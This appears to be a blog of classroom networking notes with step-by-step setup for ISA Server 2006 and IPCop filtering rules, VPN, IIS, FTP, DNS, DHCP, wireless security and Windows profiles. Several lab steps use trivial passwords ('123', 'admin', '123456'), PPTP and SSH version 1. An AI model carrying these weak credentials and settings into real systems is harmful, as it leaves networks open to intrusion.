ISA Server 2006
ISA Server 2006
1-Create Rule To Allow Internet Access for ISA and User
-----------------------------------------------------------------
-Open ISA Server => Array => Server name => Firewall Policy => Right-Click
=>News-Access Rule ... - Access rule name: Allow internet access for ISA
and Users => Action: Allow => All Outbound Traffice - From Source:
Local Host and Internal => Next => To Destination: External => Finish
=>Apply-Test Open internet both at ISA machine and User PC.
------------------------------------------------------------------------
2-Creat Rule to Block Yahoo Messanger
-Open ISA Server=> Array => Server Name => Firewall Policy => Right-click
=> New =>Access Rule... - Access rule name: Block yahooMSG => New
=> Choose the following:
-Protocol type : TCP
-Direction : Outbound
-Port Range : From: 5000 To: 5050
=2 Next => Finish => Expand User-Defined => Double click on protocol name:
Yahoo MSG => Close - from Source: interal => next => to Destination External
=>Finish =>Apply - Test Sign in yahoo messanger at User PC
------------------------------------------------------------------------
3- Creat Rule to Block User download software
-Open ISA Server => array => Server name => Firewall Policy => Right-click
=>New=>Access Rule... - Access rule name: Block download => Action: Allow
Outbound Traffic - From Source: Internet => Next => To Destination : External
=>Finish => Apply - Right-Click on this rule => Configure HTTP => Extension
Tab => Block specified extensions => Add file extensions you want to block :
"exe, bat, com, dll, ocx, cab, rar, zip, tar, pif, js, vbs, flv, swf ..."
-Test downloads software at User PC with allthesoft.com
------------------------------------------------------------------------
4- Creat Rule to Block URL website Google.com
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
-New => Access Rule ... - Access rule name: Block Google.com => Action: Deny
=> All Outbound Traffic - FROM Source: Internal => Next => To Destination :
Add => new => URL Set => Name: Google => Add: http://google.com => OK
=> Expand: URL Sets => Double click Google URL => Close => Finish
-Test open website google.com at User PC.
------------------------------------------------------------------------
5- Creat Rule to Block User IP
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
-New => Access Rule ... - Access rule name: Block User IP => Action: Deny
-All Outbound Traffic-From Source: Add =>New =>computer-Name:XP1 =>Computer
IP Address :10.0.0.5 - Expand Computer => Double click on XP1 - Close - next
-To Destination: External - Test open internet on User PC name XP1
------------------------------------------------------------------------
6- Creat Rule for restricted and unrestricted users
*For Restricted User rule:
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
-New => Access Rule ... - Access rule name: Restricted Users => Action: Allow
-Selected protocols -add-chose the protocols: HTTP, HTTPS, DNS, POP3, POP3S,
SMTP, SMTPS, Yahoo MSG
=>FROM Source: Internal - Next - To Destination: External - finish - Apply
-Right-Click on this rule - Configure HTTP - Extensions Tab
- Block Specification extensions - add file extensions you want to block:
exe, bat,com,dll, ocx, cab, rar, zip, tar, pif, js, vbs, flv, swf...
*For Unrestricted User rule:
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
-New => Access Rule ... - Access rule name: Unrestricted Users => Action: Allow
All Outbound Traffics
=>FROM Source: Add => New - Computer - name: ITPC - Computer IP Address :
10.0.0.10 -Expand computer - Double click on ITPC - close - next - To Destination:
External - Finish - Apply
=>Test Open internet both at IT Computer and User PC
------------------------------------------------------------------------
7- Bandwidth Splitter for ISA
*Install Software: bspliter2006.exe
-Open ISA Server => Array => Server Name => Expand Bandwidth Splitter-Right-
Click on Shaping Rule - new - rule - Shaping rule name: 64/128=> next - choose
"IP address sets specified below" => Add: Internal - next - Destination: External
=>2 next - choose "Shape incoming and outgoing trafic" - Incoming (kbits/s):64
and Outgoing(kbits/s): 128-next choose "Assign bandwidth individually to each
applicable user/ address"-next - finish - click Monitor to view who download
and where it gets address from ...
------------------------------------------------------------------------
8- Creat Rule to Block User IP Range
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
-New => Access Rule ... - Access rule name: Block User IP Range => Action: Deny
-All Outbound Traffic-From Source: Add =>New =>computer Set -Name:Accounting Range
=>Computer IP Address :10.0.0.2 -10.0.0.15 - Expand Computer => Double click
on Accounting Range - Close - next
=>To Destination: External
=>Test open internet on User PC Computer IP Address :10.0.0.2 -10.0.0.15
Work?
---------------------------------
=> Block Content:
-Right-click (Block User IP Range)-Properties- Content types- Selected content types ...
-Check HTML Documents, Text ... => ok
- Test open internet on Client Computer IP Address :10.0.0.16
---------------------------------
9- Restricted Internal Network to Other Web (facebook.com => iic.edu.kh):
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
-New => Access Rule ... - Access rule name: Deny Access facebook => Action: Deny
-All Outbound Traffic-From Source: Internal - next
-To Destination: new - URL set - name: facebook - new - http://*.facebook.com - ok
-add - facebook - 2 next - finish - Right-click (Firewall Policy "Deny Access facebook")
-properties- Action - Deny - Check (Redirect HTTP Re...) - http://www.iic.edu.kh - ok
-Test open internet on Client
---------------------------------
10- Setup VPN Server and Client :
=>Creat new group: VPN_Group and User: vpn_user1
-Open ISA Server => Array => Server Name => Virtual Private Networks( VPN ):
=> Step1: Configure address Assignment Methode and Enable VPN Clients:
-Click Add => Select Server Name
-Set private IP range: From 172.16.0.1 To 172.16.0.10 =>ok
-Click "Enable VPN Client Access" => 10
=> Step2: Specify Windows Users => Add Group: VPN_Group
=> Step3: Verify VPN Properties => Tick "Enable PPTP" =>Ok
Remote Access Config => Tick "External" =>Ok
=>Step4: View Firewall Policy for VPN Client Network:
-Right-click on Firewall Policy => New => Access Rule
-Access rule name: Allow VPN Users to access Internal => Action: Allow
-All Outbound Traffics - From Source: VPN Clients - next
-To Destination: Internal => Finish
=>Step5: View Network Rule:
-Creat new VPN Connection in user PC on the internet as below:
.Username:vpn_user1
.Password:123
.Gateway :192.168.1.253 (public IP of ISA WAN Interface)
-Test connect VPN on internet to dial to internal via ISA VPN on Client
Firewall (Sofware and hardware)
Firewall:
- Monitor internet traffic
- Restrict internet usages
- Proxy: cache webpage = save webpage
- VPN...
ISA Firewall => must 2 Network cards
1. WAN Network card: set ip ISP
2. LAN Network card: Set ip local network
- Firewall: software & hardwae
Firewall Software:
- ISA Server: Run on Windows 2003
- IPCop: Linux-base
- Smoothwall
- MicroTec...
Harware Firewall:
- Cisco ASA, PIX => Router
- Watchguard => Router
- LinkSys, Dlink => Router
ADSL Router:
- Router
- Modem
- Switch
- Wifi
------------------------------------------
Internet Traffic:
- Incoming traffic: Download
- Outgoing traffic : Upload
- Send email: outgoing traffic
- open yahoo.com: in + out
- download software: in
- upload website to hosting: out
- User on internet remote VPN to local Office: inoming
- user on internet open webmail of local mail server: incoming
------------------------------------------
- Network 4 category:
- localhost: local computer: 127.0.0.1
- Internal: LAN: local network
- External: WAN: Internet
- VPN: Extranet: local network stay on internet
Router:
- WAN: 203.189.128.222
- LAN: 10.0.0.1
2000-2003
- Modem: converter line to network sinal
- Router: NAT (map internal & external to same network)
- Switch: Share internet
2005: Router: 3-1
A.Install IPCop on VMware
A.Install IPCop on VMware:
-----------------------
1. Create new machine VMWare
2. Insert Disc IPcop
3. Boot to disc IPcop
4. Start install
- Green Interface = LAN Interface: 10.0.0.1: done
- Red Interface = WAN Interface: 192.168.1.2
- Before install IPCOp:
=> 2 Network Card
=> Add Network card in VMWare
VMWare Network firewall:
- LAN: VMNet02
- WAN: Bridge
--------------------------------
1. Root Password
2. Web admin password
3. backup password
--------------------------------
B.Share Internet to User :
-----------------------
1- Check IP of Red and Green on IPCop
Red = WAN = 192.168.1.2/24
Green = LAN = 10.0.0.1/8
=> login: root
pwd: 123456
=> setup
- Address RED/Green
- DNS & Gateway
- DHCP for client
2. setup client internet
-----------------------
=> make sure network adapter of client is VMNet2
=> Network card of Client same to IPCop LAN interface = Green interface
* Note:
to check internet work on IPCOp: ping google.com
=> ping 203.189.128.1 = DNS ISP
3. connect to IPCop using web interface
--------------------------------------
- open IE: htp://10.0.0.1:81
=> username: admin/pwd: 123456
4. Install add-on "Advaned Proxy"
--------------------------------
=>System-SSH Access- Tick(SSH Access, Support SSH Protocol Version1 ...)
- Using WinSCP: copy file from windows to Linux
- using Putty to remote install on IPCOP
cd .. = change to root directory
pwd = view current directory that we use
ll = list directory & file
- Unzip file advproxy:
#tar -xzfipcop-advproxy-3.0.3.tar
- install advproxy:
#ipcop-advproxy/install
- check advproxy on IPCOP:
http://10.0.0.1:81
Setup Wireless/Securit
Setup Wireless/Securit:
------------------------
1. Login to Wireless router (linksys)
- Open browser: 192.168.1.1
- Username: admin
- Password: admin
- SSID: Wireless Name (ITS-Computer)
- Enable SSID Broadcast: show wireless name
- Click SaVE
-------------------------------------
802.11 : Wifi standard
Wireless B: 11Mbps
Wireless G: 54Mbps
Wireless N: 100-300Mbps
-------------------------------------
Wireless:
WPAN: bluetooth, infra =>
WLAN: Wifi => access point
WWAN: GSM, Edge, 3G, 4G => Microwave
-------------------------------------
2. Setup Security:
WPA2/PSK
WPA: to encrypt wireless signal
PSK: to authenticate wireless client using key
send signal: yahoo.com => %$%^$^$^%$^ (WPA)
3. Filter MAC Address (Wireless client)
---------------------
- Mac adress = Hardware address = phisical address = Network card address
- IP address = software address = logical address
MAC = C8-3A-35-D1-7E-F1
---------------------
Wireless Security:
- PSK: wireless password
- WPA: wireless encryption
- MAC Filter
-----------------------------------------------
- Firewall: software & hardwae
Firewall Software:
- ISA Server: Run on Windows 2003
- IPCop: Linux-base
- Smoothwall
- MicroTec...
Harware Firewall:
- Cisco ASA, PIX => Router
- Watchguard => Router
- LinkSys, Dlink => Router
ADSL Router:
- Router
- Modem
- Switch
- Wifi
------------------------------------------
Internet Traffic:
- Incoming traffic: Download
- Outgoing traffic : Upload
- Send email: outgoing traffic
- open yahoo.com: in + out
- download software: in
- upload website to hosting: out
- User on internet remote VPN to local Office: inoming
- user on internet open webmail of local mail server: incoming
------------------------------------------
- Network 4 category:
- localhost: local computer: 127.0.0.1
- Internal: LAN: local network
- External: WAN: Internet
- VPN: Extranet: local network stay on internet
2000-2003
- Modem: converter line to network sinal
- Router: NAT (map internal & external to same network)
- Switch: Share internet
2005: Router: 3-1
3 type of profile in network server
Profile: there are three profiles
1-Local User Profile: (Automatic creat after user log in first time that it copy from
Original profile is Document and setting\Default)
2-Roaming profile: It is a Network profile that creat after user log in domain in the
first time that it copy profile from client pc to Server pc.
3-Mandatory Profile: This profile like as Roaming profile but it has permission as
Guest or limit permission.
---------------------------------------------------------
2-Roaming Profiles:
-AllowDomainUser:(Group Policy Managerment Edit)-computer configuration
-policies-windows Setting-security setting- localPolicy
-user Right Assigment-Allow log on locally - add (Domain Users) -ok
-gpupdate /force -log of server- log on user name.
=>c: (find username profile).
=>log in back to administrator- my computer -properties-Advanced-UserProfiles
-setting-client user name (roaming)-copyto (D-E:Profile"shared" clien-username
directory) but on network must \\server1\profile\clien-username directory ok.
=>Active directory user-computer =>R-click User name => properties=>Profile
UserProfile - Profile path: \\server1\profile\clien-username.
=>Testing profile of clien-username
(AllowUserAsAdmin:R-click User name => properties =>MemberOf=>Add=>Domain Admins)
3-Mandatory Profiles
As I mentioned, mandatory profiles are simply read-only versions of
the standard roaming profiles I've already discussed. Creating a mandatory
profile is probably one of the simplest administrative tasks you'll ever
perform. If you look in each individual profile directory, you'll find
a hidden file called NTUSER.DAT. This file contains all the user-configurable
aspects of the profile. To create a mandatory profile, simply rename this
file NTUSER.MAN.
NTUSER.DAT => NTUSER.MAN
*Conclusion
As I've explained in this series, you can use profiles to make the
users' lives easier, your life easier, or both. Roaming and mandatory
profiles can be very handy to both administrators and users.
Build Web Server
Build Web Server (IIS: Internet Information Services)
=>Can use with Intranet & Internet
=>Used to fly Web site or as Web Hosting
---------------------------------------------------
To protect from Hacker:
=>Microsoft build up IIS 6.0 have:
a.IIS Lockdown Wizard: Use to Lock & Unlock web server like: .asp, .html,
.jpg, .gif, .bmp ... and can multi operate Active Server Page
with Front Page server.
b.FTP User Isolation: Protect from Hacker that used Protocol TCP/IP on other
Operation System attack to FTP Server.
c.Can Access with Low-Privileged account for down attack from Hacker like:
-Active Control : Control user account with web server
-Authentication : provide the real protect (User account & Pwd)
-Encryption : Secure with online business (Bank, Credit Card...)
that provide Encryption to Protocol secure Sock Layer
(SSL 3.0).
-Auditing : control user account with web site.
-----------------------------------------------------
There are 4 IIS sevice:
a.File Transfer Protocol (FTP) Server : It is a service that use protocol FTP that
can Upload fast Data (port=21).
b.Hyper Text Tranfer Protocol (HTTP) : It use protocol HTTP for translate code:
(HTML, java, Asp, Php... "Port=80").
c.Simple mail Transfer Protocol (SMTP) : For send mail to internet.
d.Network News Transfer Protocol (NNTP) : For read the new of news ISP provider.
---------------------------------------------------
1. Add IIS Components:
-Start => Administrative tool => Manage your Server
-Click Role => Add Roles => Choose Application Server (IIS, Asp.NET)
(Follow screen).
---------------------------------------------------
2.Set directory path for storing website:
-Start => Administrative Tools => Internet Information Services (IIS) Manager
-Expand Server name\ Web Sites\Default Website => Right-click on it =>
a.Website:
-Description : (vithya-computer)
-IP address : (192.168.168.168)
b.Home Directory:
-Local Path: (C:\inetpub\wwwroot)
-Tick: (Script Source access)
c.Documents (Set index file "index.htm"):
=> Move Index.htm to the first top
to make default home page of the website.
=>ok-select all - ok
---------------------------------------------------
3.Create Virtual Directory:
=> R-click (vithya-computer)- New Virtual Directory
-Next - Alias: (vithya-computer)
-Path: (C:\Inetpub\wwwroot)-Next(2)-finish
---------------------------------------------------
4.Create website:
-Creat new file name: index.htm and open with notepad => write some words
you want - save it to (C:\inetpub\wwwroot).
5.Test Opening website:
-Open IE or Firefox on client computer or server
-Type IP address of Web server: (192.168.168.168)
Virtual Private Network Server
Virtual Private Network (VPN) Server:
-------------------
-VPN : Is the highest secure of the LAN network system for client or networks remote.
-VPN : There are 2 type:
a.User to Network : It is the coporate Intranet from client to network.
b.Network to Network : It is the coporate Internet from network to network.
-------------------
1- VPN Server:
(Have 2 Network Interface Cards:)
1-LAN:192.168.168.168
2-WAN:192.168.20.19
=>Start - programs - Administrative tools - Routing and Remote Access
=>R-Click (Local Host Name)- Configure and Enable Routing and Remote Access - next
.Virtual Private Network (VPN) access and NAT - next - Private Network(LAN)
-Next- From a specified range of addresses - New - (set DHCP for VPN Client)
=> 192.168.168.1 => 192.168.168.20
-Next - finish - ok
-------------------
2- Create user account in AD :
=> Start - Administrative Tools - Active Directory User & Computers
-create new user whatever you want, example:
username: vpn1
passwords:123
username: vpn2
passwords:123
=> Properties (vpn1 & vpn2) - Dial-in - Network Access Permission (Allow access) - ok
-------------------
3- Testing VPN Client (Stand on the internet) to remote VPN Server:
=>Start - run - ncpa.cpl - Creat a new connection - Next
- connect - Connect to the network at my workplace
- Virtual Private Network Connection - Next - Company Name (VPN client)
- Host name or IP address (192.168.168.168) - My use only - Tick(add a short..)
- Finish - User name: xxxx - password: xxxx - Tick (Save this user ...)
VPN need 2 NIC
Lan 192.168.1.1
Wan 203.1.2.3
Lan 10.0.0.1
WAN 192.168.1.253
ping 10.0.0.2 local pc ip
Building FTP Server
Building FTP Server: (File Transfer Protocol) Service
-------------------
1- Add FTP component in IIS:
=>Start - control Panel - Add or Remove Programs
-Add Remove Windows Components - Application Server
-Details... - Internet Information Services (IIS)
-Details... - Files Transfer Protocol (FTP) Service -ok
2- Set Folder path to store files:
=>Start - Administartive Tools - IIS Manager
=>Expand server name - Click FTP Site - Click here
to lunch on right panel.
=>Expand server name - R-Click on FTP Site => New FTP Site
-Next - Description: FTP Server => Choose IP: (192.168.168.168)
and port: 21 => Next => Path: c:inetpub\ftproot
=>Select: Read and Write => Next - Finish.
=>Right-Click on FTP Server that just created => Start.
3- Set Security for users to access FTP site and disable anonymouse access:
=>Right-click on FTP Server => Permision
- Give full permision to group: "Users"
=>Right-click on FTP Server => Properties => Security Accounts
- Untick "Allow anonymous.."
4- Create user account in AD & testing FTP:
=> Start - Administrative Tools - Active Directory User & Computers
-create new user whatever you want, example: username: ftp_user and
passwords:123
=>Open IE: ftp://192.168.168.168 => Enter username and password you
just created above - Click View menu => Open FTP Site in Windowss
Explorer => Retype username & pwd again
=>Test create new folder and new text file or copy document on
FTP site
=>Open C:\inetpub\ftproot => you will see file & folder that you created.
Build DNS Server
Build DNS Server: DNS(Domain Name System)
a-DNS It is an internet service used to translate from domain name to IP address so it easy remember
then IP address but however Internet used IP address so everytime we used domain name it always
translate to IP address .
b-DNS it has important duties to store record host database for every network computer can easily
connect.
ex. www.google.com ip address = 64.233.167.147
.com for business
.net for network system
.edu for education ministry
.org for Organization
.gov for Government
.kh for note that khmer
www.iic.edu.kh.
----------------
1. Set fix IP
Ip add :192.168.21.254
Sub Net :255.255.255.0
Default :192.168.21.1
DNS :192.168.21.254
2. Config DNS:
a- Create Forward zone: map name to ip
=> When build Domain Controller => it automatic create DNS Forward zone.
=> But we can delete it and recreate the forward zone
-Delete all in Forward Lookup Zones - R-click (Forward Lookup Zones) - New Zone Wizard
Next 3 - Zone name (iic.edu.kh) - next 2 - finish
=> After create forward zone => Must create the A record: it's used to point host name to ip address
-R-click (iic.edu.kh) => New Host (A) - Name (Host Name of server) Server1 - IP add (192.168.21.254)
-Add Host - ok - Done
b- Create Reverse zone: map ip to name
-R-click (Reverse Lookup Zone - News Zone - next 3- Network ID: 192.168.21)-Next 2 - finish
=> After create reverse zone => Must create PTR record: it's used to point ip address to hostname
-R-click (192.168.21.x Subnet) - News Pointer (PTR) - Host Ip number 254 - Browse (server1.iic.edu.kh)
3. Test DNS:
- C:/>nslookup
4. Tes Reverse Lookup zone
- > 192.168.20.7 =>Enter
5. Show DNS Zone:
- > set all
6.set debug - iic.edu.kh
-set q=any
yahoo.com
hotmail.com
Before test DNS in windows server 2008 => Must disable IPV6
=> this test is work for DNS, you can you DNS command: set q=any to query any domain name for
DNS record like: A, MX, CNAME record.... and NS record
=> this query is resolved by our local DNS Server that we just created.
- internet address = 64.4.20.174 => A Record(point name to IP)
- nameserver = ns2.msft.net => NS Record (point to DNS Server)
- mail exchanger = mx1.hotmail.com => MX Record (point to Mail Server)
- primary name server = ns1.msft.net
responsible mail addr = msnhst.microsoft.com
serial = 2010082401
refresh = 1800 (30 mins)
retry = 900 (15 mins)
expire = 2419200 (28 days)
default TTL = 3600 (1 hour)
=> All above are the SOA record (Start of Authority): used to refresh or retry the DNS Records
Build DHCP Server
Build DHCP Server (DHCP: Dynamic Host Configuration Protocol)
Autos apply Dynamic IP-Address to Client Network Card:
(IP-Address, Subnet mask, default getway, dns ..)
----------------------------------------------------
What DHCP?
=>There are two DHCP:
a.DHCP Server: Is the free IP-Adress storage center
b.DHCP Client: Take the Ip-Adress from DHCP server
=>There are 4 processing from DHCP Server to DHCP Client:
a.IP Lease Discover : Client request to DHCP server
for free IP-Address
b.IP Lease Offer : DHCP server control all IP-Adress
and send back the free IP-Address for client
c.IP Lease Request : Client select the Randomize of
the free IP-Address
d.IP Lease acknoledgment: DHCP server Accept with the Client select
of free IP-Address
----------------------------------------------------
1.Add DHCP Component:
=>Start - Programs - Administrative Tools - Manage Your Sever:
-Manage Your Server Roles - Add or remove a role
-Next - DHCP sever - Next (3) - Cancel - Finish .
(follow screen)
2.Create new Scope and set Server Option (Router & DNS IP):
=>Start - Programs - Administrative Tools -DHCP - R-Click (Host Name)
- New Scope - Next - Names: "DHCP for Office Admin, for ..... "
- Description: IIC University - Next :
.Start IP Address: xxx.xxx.xxx.xxx (192.168.168.1)
.End IP Address: xxx.xxx.xxx.xxx (192.168.168.254)
.Length: 24
.Subnet mask: Autos (255.255.255.0)
-Add: Exception IP
1. For Leader & IT Office
.Start IP Address: xxx.xxx.xxx.xxx (192.168.168.1)
.End IP Address: xxx.xxx.xxx.xxx (192.168.168.20)
2 For Server
.Start IP Address: xxx.xxx.xxx.xxx (192.168.168.161)
.End IP Address: xxx.xxx.xxx.xxx (192.168.168.170)
3 For Printer & Reserve ...
.Start IP Address: xxx.xxx.xxx.xxx (192.168.168.200)
.End IP Address: xxx.xxx.xxx.xxx (192.168.168.254)
-Next: (Expire Date) - Next(2) - Router (Default Gateway)
(192.168.1.1).
A. Domain Name and DNS Severs:
-Parent domain : "vithya.local"
-Server Name : "server1"
-IP address : "192.168.168.168" - Add (Resolve)
-IP address : "203.217.168.27" (ISP)
-Next
B. WINS Severs:
-Server Name : "server1"
-IP address : "192.168.168.168" - Add(Resolve)
-Next (2)- finish.
=>R-Click (server1.vithya.local[192.168.168.168]) - Authorize
3. DHCP Reservations : for dublicate Ip can used also.
=>R-Click (Reservations) - New Reservations
. Reservations Name : xxxx (DomainServer01)
. IP Address : (192.168.168.168)
. MAC address : (000000000000)
- DHCP only - Add .
4.Testing DHCP Server at User Computer:
-Log on to computer user - change TCP/IP to Optain IP Address Automatically
-Start => Run - cmd => c:ipconfig /all
=>To see it obtain IP from server or not
=>If not try command: c:\ipconfig /release and C:\ipconfig /renew
ISA Server 2006
ISA Server 2006
1-Create Rule To Allow Internet Access for ISA and User
-----------------------------------------------------------------
-Open ISA Server => Array => Server name => Firewall Policy
=> Right-Click
=>News-Access Rule ... - Access rule name: Allow internet access for
ISA
and Users => Action: Allow => All Outbound Traffice - From
Source:
Local Host and Internal => Next => To Destination: External =>
Finish
=>Apply-Test Open internet both at ISA machine and User PC.
------------------------------------------------------------------------
2-Creat Rule to Block Yahoo Messanger
-Open ISA Server=> Array => Server Name => Firewall Policy
=> Right-click
=> New =>Access Rule... - Access rule name: Block yahooMSG =>
New
=> Choose the following:
-Protocol type : TCP
-Direction : Outbound
-Port Range : From: 5000 To: 5050
=2 Next => Finish => Expand User-Defined => Double click on
protocol name:
Yahoo MSG => Close - from Source: interal => next => to
Destination External
=>Finish =>Apply - Test Sign in yahoo messanger at User PC
------------------------------------------------------------------------
3- Creat Rule to Block User download software
-Open ISA Server => array => Server name => Firewall Policy
=> Right-click
=>New=>Access Rule... - Access rule name: Block download =>
Action: Allow
Outbound Traffic - From Source: Internet => Next => To
Destination : External
=>Finish => Apply -
Right-Click on this rule => Configure HTTP => Extension
Tab => Block specified extensions => Add file extensions you want
to block :
"exe, bat, com, dll, ocx, cab, rar, zip, tar, pif, js, vbs, flv,
swf ..."
-Test downloads software at User PC with allthesoft.com
------------------------------------------------------------------------
4- Creat Rule to Block URL website Google.com
-Open ISA Server => Array => Server Name => Firewall Policy
=> Right-click
-New => Access Rule ... - Access rule name: Block Google.com =>
Action: Deny
=> All Outbound Traffic - FROM Source: Internal => Next => To
Destination :
Add => new => URL Set => Name: Google => Add:
http://google.com => OK
=> Expand: URL Sets => Double click Google URL => Close =>
Finish
-Test open website google.com at User PC.
------------------------------------------------------------------------
5- Creat Rule to Block User IP
-Open ISA Server => Array => Server Name => Firewall Policy
=> Right-click
-New => Access Rule ... - Access rule name: Block User IP => Action:
Deny
-All Outbound Traffic-From Source: Add =>New =>computer-Name:XP1
=>Computer
IP Address :10.0.0.5 - Expand Computer => Double click on XP1 -
Close - next
-To Destination: External - Test open internet on User PC name XP1
------------------------------------------------------------------------
6- Creat Rule for restricted and unrestricted users
*For Restricted User rule:
-Open ISA Server => Array => Server Name => Firewall Policy
=> Right-click
-New => Access Rule ... - Access rule name: Restricted Users =>
Action: Allow
-Selected protocols -add-chose the protocols: HTTP, HTTPS, DNS, POP3,
POP3S,
SMTP, SMTPS, Yahoo MSG
=>FROM Source: Internal - Next - To Destination: External - finish -
Apply
-Right-Click on this rule - Configure HTTP - Extensions Tab
- Block Specification extensions - add file extensions you want to
block:
exe, bat,com,dll, ocx, cab, rar, zip, tar, pif, js, vbs, flv, swf...
*For Unrestricted User rule:
-Open ISA Server => Array => Server Name => Firewall Policy
=> Right-click
-New => Access Rule ... - Access rule name: Unrestricted Users =>
Action: Allow
All Outbound Traffics
=>FROM Source: Add => New - Computer - name: ITPC - Computer IP
Address :
10.0.0.10 -Expand computer - Double click on ITPC - close - next - To
Destination:
External - Finish - Apply
=>Test Open internet both at IT Computer and User PC
------------------------------------------------------------------------
7- Bandwidth Splitter for ISA
*Install Software: bspliter2006.exe
-Open ISA Server => Array => Server Name => Expand Bandwidth
Splitter-Right-
Click on Shaping Rule - new - rule - Shaping rule name: 64/128=>
next - choose
"IP address sets specified below" => Add: Internal - next
- Destination: External
=>2 next - choose "Shape incoming and outgoing trafic" -
Incoming (kbits/s):64
and Outgoing(kbits/s): 128-next choose "Assign bandwidth
individually to each
applicable user/ address"-next - finish - click Monitor to view
who download
and where it gets address from ...
------------------------------------------------------------------------
8- Creat Rule to Block User IP Range
-Open ISA Server => Array => Server Name => Firewall Policy
=> Right-click
-New => Access Rule ... - Access rule name: Block User IP Range
=> Action: Deny
-All Outbound Traffic-From Source: Add =>New =>computer Set
-Name:Accounting Range
=>Computer IP Address :10.0.0.2 -10.0.0.15 - Expand Computer =>
Double click
on Accounting Range - Close - next
=>To Destination: External
=>Test open internet on User PC Computer IP Address :10.0.0.2 -10.0.0.15
Work?
---------------------------------
=> Block Content:
-Right-click (Block User IP Range)-Properties- Content types- Selected
content types ...
-Check HTML Documents, Text ... => ok
- Test open internet on Client Computer IP Address :10.0.0.16
---------------------------------
9- Restricted Internal Network to Other Web (facebook.com =>
iic.edu.kh):
-Open ISA Server => Array => Server Name => Firewall Policy
=> Right-click
-New => Access Rule ... - Access rule name: Deny Access facebook
=> Action: Deny
-All Outbound Traffic-From Source: Internal - next
-To Destination: new - URL set - name: facebook - new -
http://*.facebook.com - ok
-add - facebook - 2 next - finish - Right-click (Firewall Policy
"Deny Access facebook")
-properties- Action - Deny - Check (Redirect HTTP Re...) -
http://www.iic.edu.kh - ok
-Test open internet on Client
---------------------------------
10- Setup VPN Server and Client :
=>Creat new group: VPN_Group and User: vpn_user1
-Open ISA Server => Array => Server Name => Virtual Private
Networks( VPN ):
=> Step1: Configure address Assignment Methode and Enable VPN
Clients:
-Click Add =>
Select Server Name
-Set private IP range:
From 172.16.0.1 To 172.16.0.10 =>ok
-Click "Enable
VPN Client Access" => 10
=> Step2: Specify Windows Users => Add Group: VPN_Group
=> Step3: Verify VPN Properties => Tick "Enable PPTP"
=>Ok
Remote Access Config => Tick
"External" =>Ok
=>Step4: View Firewall Policy for VPN Client Network:
-Right-click on
Firewall Policy => New => Access Rule
-Access rule name:
Allow VPN Users to access Internal => Action: Allow
-All Outbound Traffics
- From Source: VPN Clients - next
-To Destination:
Internal => Finish
=>Step5: View Network Rule:
-Creat new VPN
Connection in user PC on the internet as below:
.Username:vpn_user1
.Password:123
.Gateway
:192.168.1.253 (public IP of ISA WAN Interface)
-Test connect VPN on internet to dial to internal via ISA VPN on Client
IP-Cop:
----------------------------------------------
1.Enable Web-Proxylog to monitor Users
=>Click Menu Service - Advance Proxy - Tick " Enable on
green"
and "Transparent on green" and "Log Enable" =>
Save & Restart
=>Test open website: yahoo.com, google.com
=>To see who is opening any website => click menu logs
=>Proxy logs in
IPCop web interface
----------------------------------------------
2.Ban IP and MAC Address
=>Click Menu Service - Advance proxy - In the box: "ban IP
address (on per line)"
-typ the IP of User computer that you want to block or in the box:
"banned MAC address (00:24:8C:E9:97:A6 "on per
line")" => Type the MAC of user computer that you want to
block => save and restart
=> Test setup IP or MAC address same to the rule => Try to open
website ....
****Note: if you want to avoide the rule, just add your IP in the box:
"Unrestrict IP address (one per line)" or "Unrestrict
MAC address (one per line)"
---------------------------------------------
3.Block MIME Contents
http://www.utoronto.ca/web/htmldocs/book/book-3ed/appb/mimetype.html#arch
=>Click menu services - Advanced proxy =>at the "MIME type
filter" => Tick "Enable"
-Type any application you want to block like:
.application/octet-streams
(*.exe)
.application/zip
.application/x-tar
.application/rar
(google "MIME content" )
save & restart
=Test dowloads software...
------------------------------------------
4.Block or Ublock Outbound ports
=>Click Menu Sevices => Advanced Proxy => In the box
"Allowed standard ports (one per line)"
-To block port:80 => Remove "80 #http" => Can not open
any website
-To allow port:80 => Add "80 #http" => So that users
can open any website
---------------------------------------------
5.Limit Download Sizes
=>Click Menu Sevices => Advanced Proxy => In the box "MAX
download size (KB)" => Set 2000MB
and in the box: "MAX upload size (KB)" => Set 1000MB
*** Note: if you want to avoid the rule above =>mean NO Restrict
(Unlimite download), just add
your IP in the box: "Unrestrict IP addresses (one per line)"
or "Unrestricted MAC address (one per line)"
---------------------------------------------
6.Limit Internet Bandwidth
=>Click Menu Sevices => Traffic Shaping => Tick "Traffic
Shaping" =>Downlink speed (kbit/sec)=256
and Uplink speed (kbit/sec) = 128 =>it means that users can only
download with the speed 256 kbps
and upload speed 128 kbps.
---------------------------------------------
7.Allow only Firefox and IE User
=>Click Menu Sevices => Advanced Proxy =>Tick "Enable
Browser check" => Tick "Firefox and IE"
=>So Only Firefox and IE user can browse the website, others can
not.
---------------------------------------------
8.Block Website Facebook
=>Click Menu Sevices => URL FiLTER => in the box "block
domain (one per line)" => Type website:
facebook.com => Tick "Enable custom blacklist"
=>Test Open Facebook.com
Subscribe to:
Posts
(
Atom
)